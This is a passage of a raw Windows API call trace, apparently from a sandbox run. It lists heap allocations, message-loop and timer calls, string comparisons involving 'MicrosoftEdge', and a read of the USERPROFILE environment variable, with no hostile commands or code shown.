dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0173.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0173.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0173.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0173.987] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0173.987] TranslateMessage (lpMsg=0x8cf968) returned 0 [0173.987] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0173.987] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0173.987] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0173.987] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0173.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0173.987] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0173.987] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0173.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0173.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0173.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0173.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0173.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MicrosoftEdge", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0173.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoftEdge", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0173.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoftEdge", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0173.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoftEdge", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0173.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osoftEdge", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0173.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="softEdge", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0173.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oftEdge", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0173.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ftEdge", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0173.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tEdge", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0173.988] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0173.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0173.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0173.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0173.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77cb0 [0173.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0173.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MicrosoftEdge", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0173.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoftEdge", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0173.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoftEdge", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0173.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoftEdge", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0173.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osoftEdge", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0173.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="softEdge", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0173.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oftEdge", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0173.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ftEdge", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0173.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0173.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0173.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0173.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0173.990] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0173.990] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0173.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0173.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0173.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0173.990] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0173.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0173.990] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0173.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0173.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0173.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0173.992] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa780 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0173.992] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0173.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0173.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0173.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0173.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0173.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0173.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0173.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0173.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0173.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0173.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0173.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0173.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0173.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0173.994] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0173.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0173.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0173.994] RtlAllocateHeap 